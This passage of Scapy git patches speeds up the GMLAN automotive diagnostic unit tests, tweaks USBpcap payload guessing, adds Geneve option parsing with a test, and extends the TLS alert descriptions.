({"tx_id": 0x242, "rx_id": 0x642, "bs": 6, "stmin": 10, "padding": True, "ext_address": 0x12, "rx_ext_address": 0x23}, + {"tx_id": 0x642, "rx_id": 0x242, "bs": 6, "stmin": 5, "padding": True, "ext_address": 0x23, "rx_ext_address": 0x12}), + ({"tx_id": 0x242, "rx_id": 0x642, "bs": 0, "stmin": 0, "padding": True, "ext_address": 0x45, "rx_ext_address": None}, + {"tx_id": 0x642, "rx_id": 0x242, "bs": 0, "stmin": 40, "padding": True, "ext_address": 0x45, "rx_ext_address": None}), + ({"tx_id": 0x123, "rx_id": 0x642, "bs": 1, "stmin": 1, "padding": False, "ext_address": None, "rx_ext_address": None}, + {"tx_id": 0x642, "rx_id": 0x123, "bs": 1, "stmin": 1, "padding": False, "ext_address": None, "rx_ext_address": None}),] + +for kwargs1, kwargs2 in kwargs: + print("Testing config %s, %s" % (kwargs1, kwargs2)) + with NativeCANSocket(iface0) as cs: + cs.sniff(timeout=0.01) + with ISOTPSoftSocket(iface0, **kwargs1) as s, ISOTPNativeSocket(iface0, **kwargs2) as ns: + ns.send(ISOTP(bytes.fromhex(message))) + isotp = s.recv() + assert(isotp.data == dhex(message)) + ns.send(ISOTP(bytes.fromhex("00 11 22"))) + isotp = s.recv() + assert (isotp.data == dhex("00 11 22")) + pks1 = cs.sniff(timeout=0.01) + with ISOTPNativeSocket(iface0, **kwargs1) as s, ISOTPSoftSocket(iface0, **kwargs2) as ns: + ns.send(ISOTP(bytes.fromhex(message))) + isotp = s.recv() + assert(isotp.data == dhex(message)) + ns.send(ISOTP(bytes.fromhex("00 11 22"))) + isotp = s.recv() + assert (isotp.data == dhex("00 11 22")) + pks2 = cs.sniff(timeout=0.01) + assert len(pks1) == len(pks2) and len(pks2) > 0 + for p1, p2 in zip(pks1, pks2): + assert bytes(p1) == bytes(p2) + + ISOTPNativeSocket tests From 25625df665f3fcaa01ce4676d300780c3c41c0d3 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Thu, 24 Feb 2022 18:24:26 +0100 Subject: [PATCH 0745/1632] Speedup GMLANUtils unit tests (#3528) * speedup unit tests * Speedup GMLAN utils tests --- test/contrib/automotive/gm/gmlanutils.uts | 109 ++++++++-------------- 1 file changed, 39 insertions(+), 70 deletions(-) diff --git a/test/contrib/automotive/gm/gmlanutils.uts b/test/contrib/automotive/gm/gmlanutils.uts index 932335b4287..72144dd37f0 100644 --- a/test/contrib/automotive/gm/gmlanutils.uts +++ b/test/contrib/automotive/gm/gmlanutils.uts @@ -71,7 +71,7 @@ thread.join(timeout=5) assert res = Negative, timeout -assert GMLAN_RequestDownload(isotpsock, 4, timeout=1) == False +assert GMLAN_RequestDownload(isotpsock, 4, timeout=0.01) == False ############################ Response pending = Positive, after response pending @@ -133,7 +133,7 @@ thread = threading.Thread(target=ecusim) sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) thread.start() started.wait(timeout=5) -res = GMLAN_RequestDownload(isotpsock, 4, timeout=1) == False +res = GMLAN_RequestDownload(isotpsock, 4, timeout=0.1) == False thread.join(timeout=5) assert res @@ -149,7 +149,7 @@ thread = threading.Thread(target=ecusim) sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) thread.start() started.wait(timeout=5) -res = GMLAN_RequestDownload(isotpsock, 4, timeout=0.3) == False +res = GMLAN_RequestDownload(isotpsock, 4, timeout=0.1) == False thread.join(timeout=5) assert res @@ -162,11 +162,8 @@ def ecusim(): pending = GMLAN()/GMLAN_NR(requestServiceId=0x34, returnCode=0x78) isotpsock2.send(pending) wrongservice = GMLAN()/GMLAN_NR(requestServiceId=0x36, returnCode=0x78) - time.sleep(0.1) isotpsock2.send(wrongservice) - time.sleep(0.1) isotpsock2.send(pending) - time.sleep(0.1) ack = b"\x74" isotpsock2.send(ack) @@ -174,7 +171,7 @@ thread = threading.Thread(target=ecusim) sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) thread.start() started.wait(timeout=5) -res = GMLAN_RequestDownload(isotpsock, 4, timeout=1) == True +res = GMLAN_RequestDownload(isotpsock, 4, timeout=0.1) == True thread.join(timeout=5) assert res @@ -185,12 +182,9 @@ def ecusim(): isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) pending = GMLAN()/GMLAN_NR(requestServiceId=0x34, returnCode=0x78) isotpsock2.send(pending) - time.sleep(0.1) wrongservice = GMLAN()/GMLAN_NR(requestServiceId=0x36, returnCode=0x22) isotpsock2.send(wrongservice) - time.sleep(0.1) isotpsock2.send(pending) - time.sleep(0.1) ack = b"\x74" isotpsock2.send(ack) @@ -198,7 +192,7 @@ thread = threading.Thread(target=ecusim) sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) thread.start() started.wait(timeout=5) -res = GMLAN_RequestDownload(isotpsock, 4, timeout=1) == True +res = GMLAN_RequestDownload(isotpsock, 4, timeout=0.1) == True thread.join(timeout=5) assert res @@ -228,7 +222,7 @@ thread = threading.Thread(target=ecusim) sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) thread.start() started.wait(timeout=5) -res = GMLAN_RequestDownload(isotpsock, 4, timeout=1, retry=1) == True +res = GMLAN_RequestDownload(isotpsock, 4, timeout=0.1, retry=1) == True thread.join(timeout=5) assert res assert ecusimSuccessfullyExecuted == True @@ -296,7 +290,6 @@ started = threading.Event() def ecusim(): global ecusimSuccessfullyExecuted ecusimSuccessfullyExecuted = True - time.sleep(0) requ = isotpsock2.sniff(count=1, timeout=2, started_callback=started.set) pkt = GMLAN() / GMLAN_TD(startingAddress=0x4000, dataRecord=payload) if bytes(requ[0]) != bytes(pkt): @@ -335,7 +328,7 @@ assert res = Negative, timeout -assert GMLAN_TransferData(isotpsock, 0x4000, payload, timeout=1) == False +assert GMLAN_TransferData(isotpsock, 0x4000, payload, timeout=0.1) == False = Positive, long payload @@ -383,7 +376,6 @@ def ecusim(): isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) pending = GMLAN() / GMLAN_NR(requestServiceId=0x36, returnCode=0x78) isotpsock2.send(pending) - time.sleep(0.1) nr = GMLAN() / GMLAN_NR(requestServiceId=0x36, returnCode=0x22) isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(nr)) ack = b"\x76" @@ -393,7 +385,7 @@ thread = threading.Thread(target=ecusim) sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) thread.start() started.wait(timeout=5) -res = GMLAN_TransferData(isotpsock, 0x40000000, payload*4, maxmsglen=16, timeout=1, retry=1) == True +res = GMLAN_TransferData(isotpsock, 0x40000000, payload*4, maxmsglen=16, timeout=0.1, retry=1) == True thread.join(timeout=5) assert res @@ -415,7 +407,6 @@ def ecusim(): return ack = b"\x76" # second package with inscreased address - time.sleep(0.1) requ = isotpsock2.sniff(count=1, timeout=3, started_callback=lambda: isotpsock2.send(ack)) pkt = GMLAN() / GMLAN_TD(startingAddress=0x40000FF9, dataRecord=payload[1:]) @@ -423,7 +414,6 @@ def ecusim(): ecusimSuccessfullyExecuted = False return ack = b"\x76" - time.sleep(0.1) isotpsock2.send(ack) thread = threading.Thread(target=ecusim) @@ -459,7 +449,7 @@ conf.contribs['GMLAN']['GMLAN_ECU_AddressingScheme'] = 4 payload = b"\x00\x11\x22\x33\x44\x55\x66\x77" started = threading.Event() def ecusim(): - isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) + isotpsock2.sniff(count=1, timeout=0.1, started_callback=started.set) ack = b"\x76" isotpsock2.send(ack) @@ -467,7 +457,7 @@ thread = threading.Thread(target=ecusim) sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) thread.start() started.wait(timeout=5) -res = GMLAN_TransferData(isotpsock, 2**32, payload, timeout=1) == False +res = GMLAN_TransferData(isotpsock, 2**32, payload, timeout=0.1) == False thread.join(timeout=5) assert res @@ -493,7 +483,7 @@ conf.contribs['GMLAN']['GMLAN_ECU_AddressingScheme'] = 4 payload = b"\x00\x11\x22\x33\x44\x55\x66\x77" started = threading.Event() def ecusim(): - isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) + isotpsock2.sniff(count=1, timeout=0.1, started_callback=started.set) ack = b"\x76" isotpsock2.send(ack) @@ -501,7 +491,7 @@ thread = threading.Thread(target=ecusim) sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) thread.start() started.wait(timeout=5) -res = GMLAN_TransferData(isotpsock, -1, payload, timeout=1) == False +res = GMLAN_TransferData(isotpsock, -1, payload, timeout=0.1) == False thread.join(timeout=5) assert res @@ -521,14 +511,12 @@ def ecusim(): if bytes(requ[0]) != bytes(pkt): ecusimSuccessfullyExecuted = False ack = b"\x74" - time.sleep(0.1) requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) pkt = GMLAN() / GMLAN_TD(startingAddress=0x40000000, dataRecord=payload) if bytes(requ[0]) != bytes(pkt): ecusimSuccessfullyExecuted = False ack = b"\x76" - time.sleep(0.1) isotpsock2.send(ack) thread = threading.Thread(target=ecusim) @@ -560,10 +548,8 @@ def ecusim(): ecusimSuccessfullyExecuted = False seedmsg = GMLAN()/GMLAN_SAPR(subfunction=1, securitySeed=0xdead) # wait for key - time.sleep(0.1) requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(seedmsg)) pkt = GMLAN()/GMLAN_SA(subfunction=2, securityKey=0xbeef) - time.sleep(0.1) if bytes(requ[0]) != bytes(pkt): ecusimSuccessfullyExecuted = False nr = GMLAN() / GMLAN_NR(requestServiceId=0x27, returnCode=0x35) @@ -576,7 +562,7 @@ thread = threading.Thread(target=ecusim) sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) thread.start() started.wait(timeout=5) -res = GMLAN_GetSecurityAccess(isotpsock, keyfunc, level=1, timeout=1) == True +res = GMLAN_GetSecurityAccess(isotpsock, keyfunc, level=1, timeout=0.1) == True thread.join(timeout=5) assert res assert ecusimSuccessfullyExecuted == True @@ -593,11 +579,9 @@ def ecusim(): if bytes(requ[0]) != bytes(pkt): ecusimSuccessfullyExecuted = False seedmsg = GMLAN()/GMLAN_SAPR(subfunction=3, securitySeed=0xdead) - time.sleep(0.1) # wait for key requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(seedmsg)) pkt = GMLAN()/GMLAN_SA(subfunction=4, securityKey=0xbeef) - time.sleep(0.1) if bytes(requ[0]) != bytes(pkt): ecusimSuccessfullyExecuted = False nr = GMLAN() / GMLAN_NR(requestServiceId=0x27, returnCode=0x35) @@ -610,7 +594,7 @@ thread = threading.Thread(target=ecusim) sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) thread.start() started.wait(timeout=5) -res = GMLAN_GetSecurityAccess(isotpsock, keyfunc, level=3, timeout=1) == True +res = GMLAN_GetSecurityAccess(isotpsock, keyfunc, level=3, timeout=0.1) == True thread.join(timeout=5) assert res assert ecusimSuccessfullyExecuted == True @@ -629,10 +613,8 @@ def ecusim(): ecusimSuccessfullyExecuted = False seedmsg = GMLAN()/GMLAN_SAPR(subfunction=1, securitySeed=0xdead) # wait for key - time.sleep(0.1) requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(seedmsg)) pkt = GMLAN()/GMLAN_SA(subfunction=2, securityKey=0xbabe) - time.sleep(0.1) if bytes(requ[0]) != bytes(pkt): nr = GMLAN() / GMLAN_NR(requestServiceId=0x27, returnCode=0x35) isotpsock2.send(nr) @@ -645,7 +627,7 @@ thread = threading.Thread(target=ecusim) sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) thread.start() started.wait(timeout=5) -res = GMLAN_GetSecurityAccess(isotpsock, keyfunc, level=1, timeout=1) == False +res = GMLAN_GetSecurityAccess(isotpsock, keyfunc, level=1, timeout=0.1) == False thread.join(timeout=5) assert res assert ecusimSuccessfullyExecuted == True @@ -659,14 +641,13 @@ def ecusim(): # wait for request isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) seedmsg = GMLAN()/GMLAN_SAPR(subfunction=1, securitySeed=0x0000) - time.sleep(0.1) isotpsock2.send(seedmsg) thread = threading.Thread(target=ecusim) sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) thread.start() started.wait(timeout=5) -res = GMLAN_GetSecurityAccess(isotpsock, keyfunc, level=1, timeout=1) == True +res = GMLAN_GetSecurityAccess(isotpsock, keyfunc, level=1, timeout=0.1) == True thread.join(timeout=5) assert res @@ -675,23 +656,21 @@ assert res started = threading.Event() def ecusim(): # timeout - requ = isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) + requ = isotpsock2.sniff(count=1, timeout=0.1, started_callback=started.set) # wait for request requ = isotpsock2.sniff(count=1, timeout=3) seedmsg = GMLAN()/GMLAN_SAPR(subfunction=1, securitySeed=0xdead) # wait for key - time.sleep(0.1) requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(seedmsg)) pkt = GMLAN()/GMLAN_SA(subfunction=2, securityKey=0xbeef) pr = GMLAN()/GMLAN_SAPR(subfunction=2) - time.sleep(0.1) isotpsock2.send(pr) thread = threading.Thread(target=ecusim) sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) thread.start() started.wait(timeout=5) -res = GMLAN_GetSecurityAccess(isotpsock, keyfunc, level=1, timeout=1, retry=1) == True +res = GMLAN_GetSecurityAccess(isotpsock, keyfunc, level=1, timeout=0.1, retry=1) == True thread.join(timeout=5) assert res @@ -702,24 +681,20 @@ def ecusim(): requ = isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) seedmsg = GMLAN()/GMLAN_SAPR(subfunction=1, securitySeed=0xdead) # timeout - time.sleep(0.1) - requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(seedmsg)) + requ = isotpsock2.sniff(count=1, timeout=0.1, started_callback=lambda:isotpsock2.send(seedmsg)) # retry from start - time.sleep(0.1) requ = isotpsock2.sniff(count=1, timeout=3) seedmsg = GMLAN()/GMLAN_SAPR(subfunction=1, securitySeed=0xdead) # wait for key - time.sleep(0.1) requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(seedmsg)) pr = GMLAN()/GMLAN_SAPR(subfunction=2) - time.sleep(0.1) isotpsock2.send(pr) thread = threading.Thread(target=ecusim) sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) thread.start() started.wait(timeout=5) -res = GMLAN_GetSecurityAccess(isotpsock, keyfunc, level=1, timeout=1, retry=1) == True +res = GMLAN_GetSecurityAccess(isotpsock, keyfunc, level=1, timeout=0.1, retry=1) == True thread.join(timeout=5) assert res @@ -730,23 +705,20 @@ def ecusim(): # wait for request requ = isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) nr = GMLAN() / GMLAN_NR(requestServiceId=0x27, returnCode=0x37) - time.sleep(0.1) # wait for request requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(nr)) seedmsg = GMLAN()/GMLAN_SAPR(subfunction=1, securitySeed=0xdead) - time.sleep(0.1) # wait for key requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(seedmsg)) pkt = GMLAN()/GMLAN_SA(subfunction=2, securityKey=0xbeef) pr = GMLAN()/GMLAN_SAPR(subfunction=2) - time.sleep(0.1) isotpsock2.send(pr) thread = threading.Thread(target=ecusim) sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) thread.start() started.wait(timeout=5) -res = GMLAN_GetSecurityAccess(isotpsock, keyfunc, level=1, timeout=1, retry=1) == True +res = GMLAN_GetSecurityAccess(isotpsock, keyfunc, level=1, timeout=0.1, retry=1) == True thread.join(timeout=5) assert res @@ -766,21 +738,18 @@ def ecusim(): if bytes(requ[0]) != bytes(pkt): ecusimSuccessfullyExecuted = False ack = b"\x68" - time.sleep(0.1) # ReportProgrammedState requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) pkt = GMLAN(b"\xa2") if bytes(requ[0]) != bytes(pkt): ecusimSuccessfullyExecuted = False ack = GMLAN()/GMLAN_RPSPR(programmedState=0) - time.sleep(0.1) # ProgrammingMode requestProgramming requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) pkt = GMLAN() / GMLAN_PM(subfunction=0x1) if bytes(requ[0]) != bytes(pkt): ecusimSuccessfullyExecuted = False ack = GMLAN(b"\xe5") - time.sleep(0.1) # InitiateProgramming enableProgramming requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) pkt = GMLAN() / GMLAN_PM(subfunction=0x3) @@ -792,7 +761,7 @@ thread = threading.Thread(target=ecusim) sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) thread.start() started.wait(timeout=5) -res = GMLAN_InitDiagnostics(isotpsock, timeout=1, verbose=1) == True +res = GMLAN_InitDiagnostics(isotpsock, timeout=0.1, verbose=1, unittest=True) == True thread.join(timeout=5) assert res assert ecusimSuccessfullyExecuted == True @@ -834,7 +803,7 @@ thread = threading.Thread(target=ecusim) sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) thread.start() started.wait(timeout=5) -res = GMLAN_InitDiagnostics(isotpsock, broadcast_socket=GMLAN_BroadcastSocket(broadcastsender), timeout=5, verbose=1) == True +res = GMLAN_InitDiagnostics(isotpsock, broadcast_socket=GMLAN_BroadcastSocket(broadcastsender), timeout=5, verbose=1, unittest=True) == True thread.join(timeout=5) assert res assert ecusimSuccessfullyExecuted == True @@ -857,7 +826,7 @@ thread = threading.Thread(target=ecusim) sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) thread.start() started.wait(timeout=5) -res = GMLAN_InitDiagnostics(isotpsock, timeout=1, verbose=1) == False +res = GMLAN_InitDiagnostics(isotpsock, timeout=0.1, verbose=1, unittest=True) == False thread.join(timeout=5) assert res assert ecusimSuccessfullyExecuted == True @@ -887,7 +856,7 @@ thread = threading.Thread(target=ecusim) sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) thread.start() started.wait(timeout=5) -res = GMLAN_InitDiagnostics(isotpsock, timeout=1, verbose=1) == False +res = GMLAN_InitDiagnostics(isotpsock, timeout=0.1, verbose=1, unittest=True) == False thread.join(timeout=5) assert res assert ecusimSuccessfullyExecuted == True @@ -921,7 +890,7 @@ thread = threading.Thread(target=ecusim) sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) thread.start() started.wait(timeout=5) -res = GMLAN_InitDiagnostics(isotpsock, timeout=1, verbose=1) == False +res = GMLAN_InitDiagnostics(isotpsock, timeout=0.1, verbose=1, unittest=True) == False thread.join(timeout=5) assert res assert ecusimSuccessfullyExecuted == True @@ -946,7 +915,7 @@ thread = threading.Thread(target=ecusim) sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) thread.start() started.wait(timeout=5) -res = GMLAN_InitDiagnostics(isotpsock, timeout=1, verbose=1) == False +res = GMLAN_InitDiagnostics(isotpsock, timeout=0.1, verbose=1, unittest=True) == False thread.join(timeout=5) assert res assert ecusimSuccessfullyExecuted == True @@ -971,7 +940,7 @@ thread = threading.Thread(target=ecusim) sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) thread.start() started.wait(timeout=5) -res = GMLAN_InitDiagnostics(isotpsock, timeout=1, verbose=1, retry=0) == True +res = GMLAN_InitDiagnostics(isotpsock, timeout=1, verbose=1, retry=0, unittest=True) == True assert res thread.join(timeout=5) @@ -982,9 +951,9 @@ started = threading.Event() def ecusim(): global ecusimSuccessfullyExecuted ecusimSuccessfullyExecuted= True - requ = isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) + requ = isotpsock2.sniff(count=1, timeout=0.1, started_callback=started.set) ack = GMLAN() / GMLAN_NR(requestServiceId=0x28, returnCode=0x12) - requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) + requ = isotpsock2.sniff(count=1, timeout=0.1, started_callback=lambda:isotpsock2.send(ack)) if len(requ) != 0: ecusimSuccessfullyExecuted = False @@ -992,7 +961,7 @@ thread = threading.Thread(target=ecusim) sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) thread.start() started.wait(timeout=5) -res = GMLAN_InitDiagnostics(isotpsock, timeout=1, verbose=1, retry=0) == False +res = GMLAN_InitDiagnostics(isotpsock, timeout=0.1, verbose=1, retry=0, unittest=True) == False thread.join(timeout=5) assert res assert ecusimSuccessfullyExecuted == True @@ -1019,7 +988,7 @@ thread = threading.Thread(target=ecusim) sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) thread.start() started.wait(timeout=5) -res = GMLAN_InitDiagnostics(isotpsock, timeout=1, verbose=1, retry=1) == True +res = GMLAN_InitDiagnostics(isotpsock, timeout=0.1, verbose=1, retry=1, unittest=True) == True thread.join(timeout=5) assert res @@ -1048,7 +1017,7 @@ thread = threading.Thread(target=ecusim) sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) thread.start() started.wait(timeout=5) -res = GMLAN_InitDiagnostics(isotpsock, timeout=1, verbose=1, retry=1) == True +res = GMLAN_InitDiagnostics(isotpsock, timeout=1, verbose=1, retry=1, unittest=True) == True thread.join(timeout=5) assert res @@ -1081,7 +1050,7 @@ thread = threading.Thread(target=ecusim) sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) thread.start() started.wait(timeout=5) -res = GMLAN_InitDiagnostics(isotpsock, timeout=1, verbose=1, retry=1) == True +res = GMLAN_InitDiagnostics(isotpsock, timeout=1, verbose=1, retry=1, unittest=True) == True thread.join(timeout=5) assert res @@ -1091,11 +1060,11 @@ started = threading.Event() def ecusim(): global ecusimSuccessfullyExecuted ecusimSuccessfullyExecuted= True - requ = isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) + requ = isotpsock2.sniff(count=1, timeout=0.1, started_callback=started.set) ack = GMLAN() / GMLAN_NR(requestServiceId=0x28, returnCode=0x12) - requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) + requ = isotpsock2.sniff(count=1, timeout=0.1, started_callback=lambda:isotpsock2.send(ack)) ack = GMLAN() / GMLAN_NR(requestServiceId=0x28, returnCode=0x12) - requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) + requ = isotpsock2.sniff(count=1, timeout=0.1, started_callback=lambda:isotpsock2.send(ack)) if len(requ) != 0: ecusimSuccessfullyExecuted = False @@ -1103,7 +1072,7 @@ thread = threading.Thread(target=ecusim) sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) thread.start() started.wait(timeout=5) -res = GMLAN_InitDiagnostics(isotpsock, timeout=1, verbose=1, retry=1) == False +res = GMLAN_InitDiagnostics(isotpsock, timeout=0.1, verbose=1, retry=1, unittest=True) == False thread.join(timeout=5) assert res assert ecusimSuccessfullyExecuted == True @@ -1154,7 +1123,7 @@ thread.join(timeout=5) assert res = Negative, timeout -assert GMLAN_ReadMemoryByAddress(isotpsock, 0x0, 0x8, timeout=1) is None +assert GMLAN_ReadMemoryByAddress(isotpsock, 0x0, 0x8, timeout=0.01) is None ###### RETRY = Positive, negative response, retry succeeds From 50fd9bd77e9c5d2c10c2e85eafb3a9e44aadcb98 Mon Sep 17 00:00:00 2001 From: bveina Date: Thu, 24 Feb 2022 12:35:53 -0500 Subject: [PATCH 0746/1632] Allow custom binding to USB (win) #3534 (#3538) --- scapy/layers/usb.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/scapy/layers/usb.py b/scapy/layers/usb.py index 9e79ff5c28f..8ce00ca8b9a 100644 --- a/scapy/layers/usb.py +++ b/scapy/layers/usb.py @@ -113,14 +113,14 @@ def post_build(self, p, pay): def guess_payload_class(self, payload): if self.headerLen == 27: # No Transfer layer - return conf.raw_layer + return super(USBpcap, self).guess_payload_class(payload) if self.transfer == 0: return USBpcapTransferIsochronous elif self.transfer == 1: return USBpcapTransferInterrupt elif self.transfer == 2: return USBpcapTransferControl - return conf.raw_layer + return super(USBpcap, self).guess_payload_class(payload) class USBpcapTransferIsochronous(Packet): From 2d4091d40bc913b1b69ea40b68320c48e0ad9b78 Mon Sep 17 00:00:00 2001 From: Haresh Khandelwal Date: Tue, 10 Aug 2021 22:09:03 +0530 Subject: [PATCH 0747/1632] Added geneve header options currently, we dont have geneve options working. This patch aims to fix them. --- scapy/contrib/geneve.py | 54 ++++++++++++++++++++++++++--------------- test/contrib/geneve.uts | 7 ++++++ 2 files changed, 42 insertions(+), 19 deletions(-) diff --git a/scapy/contrib/geneve.py b/scapy/contrib/geneve.py index b387328777a..40e77d61070 100644 --- a/scapy/contrib/geneve.py +++ b/scapy/contrib/geneve.py @@ -20,28 +20,46 @@ """ Geneve: Generic Network Virtualization Encapsulation -draft-ietf-nvo3-geneve-06 +draft-ietf-nvo3-geneve-16 """ -from scapy.fields import BitField, XByteField, XShortEnumField, X3BytesField, \ - XStrField +import struct + +from scapy.fields import BitField, XByteField, XShortEnumField, X3BytesField, StrLenField, PacketListField from scapy.packet import Packet, bind_layers from scapy.layers.inet import IP, UDP from scapy.layers.inet6 import IPv6 from scapy.layers.l2 import Ether, ETHER_TYPES from scapy.compat import chb, orb -from scapy.error import warning + +CLASS_IDS = {0x0100: "Linux", + 0x0101: "Open vSwitch", + 0x0102: "Open Virtual Networking (OVN)", + 0x0103: "In-band Network Telemetry (INT)", + 0x0104: "VMware", + 0x0105: "Amazon.com, Inc.", + 0x0106: "Cisco Systems, Inc.", + 0x0107: "Oracle Corporation", + 0x0110: "Amazon.com, Inc.", + 0x0118: "IBM", + 0x0128: "Ericsson", + 0xFEFF: "Unassigned", + 0xFFFF: "Experimental"} -class GENEVEOptionsField(XStrField): - islist = 1 +class GeneveOptions(Packet): + name = "Geneve Options" + fields_desc = [XShortEnumField("classid", 0x0000, CLASS_IDS), + XByteField("type", 0x00), + BitField("reserved", 0, 3), + BitField("length", None, 5), + StrLenField('data', '', length_from=lambda x:x.length * 4)] - def getfield(self, pkt, s): - opln = pkt.optionlen * 4 - if opln < 0: - warning("bad optionlen (%i). Assuming optionlen=0", pkt.optionlen) - opln = 0 - return s[opln:], self.m2i(pkt, s[:opln]) + def post_build(self, p, pay): + if self.length is None: + tmp_len = len(self.data) // 4 + p = p[:3] + struct.pack("!B", tmp_len) + p[4:] + return p + pay class GENEVE(Packet): @@ -54,15 +72,13 @@ class GENEVE(Packet): XShortEnumField("proto", 0x0000, ETHER_TYPES), X3BytesField("vni", 0), XByteField("reserved2", 0x00), - GENEVEOptionsField("options", "")] + PacketListField("options", [], GeneveOptions, length_from=lambda pkt:pkt.optionlen * 4)] def post_build(self, p, pay): - p += pay - optionlen = self.optionlen - if optionlen is None: - optionlen = (len(self.options) + 3) // 4 - p = chb(optionlen & 0x2f | orb(p[0]) & 0xc0) + p[1:] - return p + if self.optionlen is None: + tmp_len = (len(p) - 8) // 4 + p = chb(tmp_len & 0x2f | orb(p[0]) & 0xc0) + p[1:] + return p + pay def answers(self, other): if isinstance(other, GENEVE): diff --git a/test/contrib/geneve.uts b/test/contrib/geneve.uts index 5ed6930ad72..2c43432ce08 100644 --- a/test/contrib/geneve.uts +++ b/test/contrib/geneve.uts @@ -22,6 +22,13 @@ assert(s == b'E\x00\x00:\x00\x01\x00\x00@\x11|\xb0\x7f\x00\x00\x01\x7f\x00\x00\x p = IP(s) assert(GENEVE in p and Ether in p[GENEVE].payload and p[GENEVE].critical == 1 and p[GENEVE].optionlen == 2) += Build & dissect - GENEVE with metadata options encapsulates Ether + +s = raw(Ether()/Dot1Q()/IP()/UDP(sport=57025,dport=6081)/GENEVE(proto=0x6558,options=GeneveOptions(classid=0x0102,type=0x80,data=b'\x00\x01\x00\x02'))/Ether()/IP()/ICMP(type=8)) +assert (s == b'\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x81\x00\x00\x01\x08\x00E\x00\x00V\x00\x01\x00\x00@\x11|\x94\x7f\x00\x00\x01\x7f\x00\x00\x01\xde\xc1\x17\xc1\x00B\x1a\x86\x02\x00eX\x00\x00\x00\x00\x01\x02\x80\x01\x00\x01\x00\x02\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x08\x00E\x00\x00\x1c\x00\x01\x00\x00@\x01|\xde\x7f\x00\x00\x01\x7f\x00\x00\x01\x08\x00\xf7\xff\x00\x00\x00\x00') + +p = Ether(s) +assert(GENEVE in p and Ether in p[GENEVE].payload and p[GENEVE].proto == 0x6558 and p[GeneveOptions].length == 1 and p[GeneveOptions].classid == 0x102 and p[GeneveOptions].type == 0x80) = Build & dissect - GENEVE encapsulates IPv4 From d7c6baf43ab7d54e778a9e0a0f16fe623658ff26 Mon Sep 17 00:00:00 2001 From: Olivier Levillain Date: Thu, 3 Mar 2022 11:17:00 +0100 Subject: [PATCH 0748/1632] Add missing alerts in _tls_alert_description. --- scapy/layers/tls/record.py | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/scapy/layers/tls/record.py b/scapy/layers/tls/record.py index 95f6263c501..7300d17fcfd 100644 --- a/scapy/layers/tls/record.py +++ b/scapy/layers/tls/record.py @@ -782,10 +782,12 @@ def post_build_tls_session_update(self, msg_str): 50: "decode_error", 51: "decrypt_error", 60: "export_restriction_RESERVED", 70: "protocol_version", 71: "insufficient_security", 80: "internal_error", - 90: "user_canceled", 100: "no_renegotiation", + 86: "inappropriate_fallback", 90: "user_canceled", + 100: "no_renegotiation", 109: "missing_extension", 110: "unsupported_extension", 111: "certificate_unobtainable", 112: "unrecognized_name", 113: "bad_certificate_status_response", - 114: "bad_certificate_hash_value", 115: 